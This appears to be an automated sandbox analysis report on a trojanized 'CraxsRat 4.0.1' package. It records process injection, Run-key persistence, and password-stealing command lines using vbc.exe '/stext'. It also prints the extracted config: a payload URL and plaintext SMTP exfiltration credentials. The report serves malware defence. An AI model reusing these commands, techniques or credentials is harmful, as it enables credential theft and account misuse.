Analysis
- max time kernel: 61s
- max time network: 65s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-05-2023 17:25
Behavioral tasks (task: sample / resource)
- behavioral1: CraxsRat 4.0.1/AgileDotNet.VMRuntime.dll / win10v2004-20230220-en
- behavioral2: CraxsRat 4.0.1/CraxsRat 4.0.1.exe / win10v2004-20230220-en
- behavioral3: CraxsRat 4.0.1/CraxsRat.exe.xml / win10v2004-20230220-en
- behavioral4: CraxsRat 4.0.1/DrakeUI.Framework.dll / win10v2004-20230220-en
- behavioral5: CraxsRat 4.0.1/GeoIPCitys.dll / win10v2004-20230220-en
- behavioral6: CraxsRat 4.0.1/LiveCharts.WinForms.dll / win10v2004-20230220-en
- behavioral7: CraxsRat 4.0.1/LiveCharts.Wpf.dll / win10v2004-20230220-en
- behavioral8: CraxsRat 4.0.1/LiveCharts.dll / win10v2004-20230221-en
- behavioral9: CraxsRat 4.0.1/MetroSet UI.dll / win10v2004-20230220-en
- behavioral10: CraxsRat 4.0.1/NAudio.dll / win10v2004-20230220-en
- behavioral11: CraxsRat 4.0.1/System.IO.Compression.ZipFile.dll / win10v2004-20230220-en
- behavioral12: CraxsRat 4.0.1/Vip.Notification.dll / win10v2004-20230220-en
- behavioral13: CraxsRat 4.0.1/WinMM.Net.dll / win10v2004-20230220-en
- behavioral14: CraxsRat 4.0.1/mscorlib.dll / win10v2004-20230220-en
General
- Target: CraxsRat 4.0.1/CraxsRat 4.0.1.exe
- Size: 3.6MB
- MD5: c03340af767421ec0ee35c378bbf3edb
- SHA1: 63060366f0bf2b4dcff3974deffca94b472b8773
- SHA256: 1dd45e5c7521156d2ca52d7aa5024e9fd3580ff6814a4b79161d7d730ecdb7ab
- SHA512: 70863a2729baa254fc5d0b92a8631e98596bb2ad497a5e607328cc49e32e254ec1f4309c8c085983cd70e2141be09d0429568f2aace061644c3d2d59ee39ab7f
- SSDEEP: 49152:7WsTEkwghTKv4jysGUqgCoOtt1JKsgGViSe8KuAfG9b/KMA:7FEkwghTKv4jysGUqgCxttdX8v/Ee
Malware Config
Extracted
- https://rentry.org/xau9i/raw
Extracted
- Protocol: smtp
- Host: smtp.zoho.com
- Port: 587
- Username: nexusbuscasg@zohomail.com
- Password: Nescau71#
Signatures
- NirSoft MailPassView (4 IoCs)
  Password recovery tool for various email clients
  Processes (resource / yara_rule):
  - behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp: MailPassView
  - behavioral2/memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmp: MailPassView
  - behavioral2/memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmp: MailPassView
  - behavioral2/memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmp: MailPassView
- NirSoft WebBrowserPassView (4 IoCs)
  Password recovery tool for various web browsers
  Processes (resource / yara_rule):
  - behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp: WebBrowserPassView
  - behavioral2/memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmp: WebBrowserPassView
  - behavioral2/memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmp: WebBrowserPassView
  - behavioral2/memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmp: WebBrowserPassView
- Nirsoft (7 IoCs)
  Processes (resource / yara_rule):
  - behavioral2/memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp: Nirsoft
  - behavioral2/memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmp: Nirsoft
  - behavioral2/memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmp: Nirsoft
  - behavioral2/memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmp: Nirsoft
  - behavioral2/memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmp: Nirsoft
  - behavioral2/memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmp: Nirsoft
  - behavioral2/memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmp: Nirsoft
- Blocklisted process makes network request (2 IoCs)
  Processes (flow / pid / process):
  - flow 15, pid 2916, powershell.exe
  - flow 17, pid 2916, powershell.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description / ioc / process):
  - Key value queried: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation (LX.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation (CraxsRat 4.0.1.exe)
- Drops startup file (1 IoC)
  Processes (description / ioc / process):
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk (CraxsRat 4.0.1.exe)
- Executes dropped EXE (5 IoCs)
  Processes (pid / process):
  - 1424 CraxsRat 4.0.1.exe
  - 4436 LX.exe
  - 3608 CraxsRat 4.0.1.exe
  - 1372 CraxsRat 4.0.1.exe
  - 2708 CraxsRat 4.0.1.exe
- Uses the VBS compiler for execution (1 TTP)
- Accesses Microsoft Outlook accounts (1 TTP, 1 IoC)
  Processes (description / ioc / process):
  - Key opened: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts (vbc.exe)
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes (description / ioc / process):
  - Set value (str): \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" (CraxsRat 4.0.1.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow / ioc):
  - flow 22: whatismyipaddress.com
  - flow 20: whatismyipaddress.com
- Suspicious use of SetThreadContext (3 IoCs)
  Processes (description / pid / process -> target process):
  - PID 1424 set thread context of 2708: CraxsRat 4.0.1.exe -> CraxsRat 4.0.1.exe
  - PID 2708 set thread context of 1408: CraxsRat 4.0.1.exe -> vbc.exe
  - PID 2708 set thread context of 4728: CraxsRat 4.0.1.exe -> vbc.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid / process), grouped with the number of repeated entries:
  - 2916 powershell.exe (2 entries)
  - 1424 CraxsRat 4.0.1.exe (4 entries)
  - 4440 powershell.exe (2 entries)
  - 2708 CraxsRat 4.0.1.exe (56 entries)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description / pid / process):
  - Token: SeDebugPrivilege, 2916 powershell.exe
  - Token: SeDebugPrivilege, 1424 CraxsRat 4.0.1.exe
  - Token: SeDebugPrivilege, 4440 powershell.exe
  - Token: SeDebugPrivilege, 2708 CraxsRat 4.0.1.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes (pid / process):
  - 2708 CraxsRat 4.0.1.exe
- Suspicious use of WriteProcessMemory (41 IoCs)
  Processes (description / pid / process -> target process), grouped with the number of repeated entries:
  - PID 4264 wrote to memory of 1424: CraxsRat 4.0.1.exe -> CraxsRat 4.0.1.exe (3 entries)
  - PID 4264 wrote to memory of 4436: CraxsRat 4.0.1.exe -> LX.exe (2 entries)
  - PID 4436 wrote to memory of 2916: LX.exe -> powershell.exe (2 entries)
  - PID 1424 wrote to memory of 3608: CraxsRat 4.0.1.exe -> CraxsRat 4.0.1.exe (3 entries)
  - PID 1424 wrote to memory of 1372: CraxsRat 4.0.1.exe -> CraxsRat 4.0.1.exe (3 entries)
  - PID 1424 wrote to memory of 2708: CraxsRat 4.0.1.exe -> CraxsRat 4.0.1.exe (8 entries)
  - PID 2916 wrote to memory of 4440: powershell.exe -> powershell.exe (2 entries)
  - PID 2708 wrote to memory of 1408: CraxsRat 4.0.1.exe -> vbc.exe (9 entries)
  - PID 2708 wrote to memory of 4728: CraxsRat 4.0.1.exe -> vbc.exe (9 entries)
Processes (process tree; each entry gives the image path, the command line and the signatures triggered)
- C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
    Signatures: Drops startup file; Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
      Signatures: Executes dropped EXE
    - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
      Signatures: Executes dropped EXE
    - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
      Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        Signatures: Accesses Microsoft Outlook accounts
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
  - C:\Users\Admin\AppData\Local\Temp\LX.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\LX.exe"
    Signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#cfg#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#pmm#>;
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe (6 identical entries)
  Filesize: 3.4MB
  MD5: f873bee92e6118ff16b63b2a75173818
  SHA1: 4061cab004813a12e8042b83228885dfbc88547f
  SHA256: 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
  SHA512: 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f
- C:\Users\Admin\AppData\Local\Temp\LX.exe (3 identical entries)
  Filesize: 74KB
  MD5: 1ab3092297d1806397e8d3a6747a3271
  SHA1: ea114a2e5ddee915d30458031ec5ced7f97d1650
  SHA256: 2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e
  SHA512: 1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ia4ulzyi.sfh.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Local\Temp\holderwb.txt
  Filesize: 3KB
  MD5: f94dc819ca773f1e3cb27abbc9e7fa27
  SHA1: 9a7700efadc5ea09ab288544ef1e3cd876255086
  SHA256: a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
  SHA512: 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

Memory dumps (resource: filesize)
- memory/1408-203-0x0000000000400000-0x000000000041B000-memory.dmp: 108KB
- memory/1408-205-0x0000000000400000-0x000000000041B000-memory.dmp: 108KB
- memory/1408-207-0x0000000000400000-0x000000000041B000-memory.dmp: 108KB
- memory/1424-160-0x00000000053C0000-0x0000000005964000-memory.dmp: 5.6MB
- memory/1424-157-0x0000000000070000-0x00000000003E0000-memory.dmp: 3.4MB
- memory/1424-159-0x0000000004D70000-0x0000000004E0C000-memory.dmp: 624KB
- memory/2708-200-0x0000000008AB0000-0x0000000008B16000-memory.dmp: 408KB
- memory/2708-176-0x0000000000400000-0x0000000000484000-memory.dmp: 528KB
- memory/2708-223-0x0000000005650000-0x0000000005660000-memory.dmp: 64KB
- memory/2708-212-0x0000000005650000-0x0000000005660000-memory.dmp: 64KB
- memory/2708-179-0x0000000005450000-0x00000000054E2000-memory.dmp: 584KB
- memory/2708-208-0x0000000005650000-0x0000000005660000-memory.dmp: 64KB
- memory/2708-192-0x0000000005320000-0x000000000532A000-memory.dmp: 40KB
- memory/2708-193-0x00000000055E0000-0x0000000005636000-memory.dmp: 344KB
- memory/2708-194-0x0000000005650000-0x0000000005660000-memory.dmp: 64KB
- memory/2916-210-0x000001E14D650000-0x000001E14D660000-memory.dmp: 64KB
- memory/2916-172-0x000001E14D650000-0x000001E14D660000-memory.dmp: 64KB
- memory/2916-171-0x000001E14D650000-0x000001E14D660000-memory.dmp: 64KB
- memory/2916-170-0x000001E14D5E0000-0x000001E14D602000-memory.dmp: 136KB
- memory/2916-211-0x000001E14D650000-0x000001E14D660000-memory.dmp: 64KB
- memory/2916-180-0x000001E14D650000-0x000001E14D660000-memory.dmp: 64KB
- memory/2916-209-0x000001E14D650000-0x000001E14D660000-memory.dmp: 64KB
- memory/4264-156-0x0000000000400000-0x000000000079B000-memory.dmp: 3.6MB
- memory/4436-155-0x00000000005A0000-0x00000000005B8000-memory.dmp: 96KB
- memory/4440-195-0x00000241C7E50000-0x00000241C7E60000-memory.dmp: 64KB
- memory/4440-181-0x00000241C7E50000-0x00000241C7E60000-memory.dmp: 64KB
- memory/4440-190-0x00000241C7E50000-0x00000241C7E60000-memory.dmp: 64KB
- memory/4728-213-0x0000000000400000-0x0000000000458000-memory.dmp: 352KB
- memory/4728-215-0x0000000000400000-0x0000000000458000-memory.dmp: 352KB
- memory/4728-222-0x0000000000400000-0x0000000000458000-memory.dmp: 352KB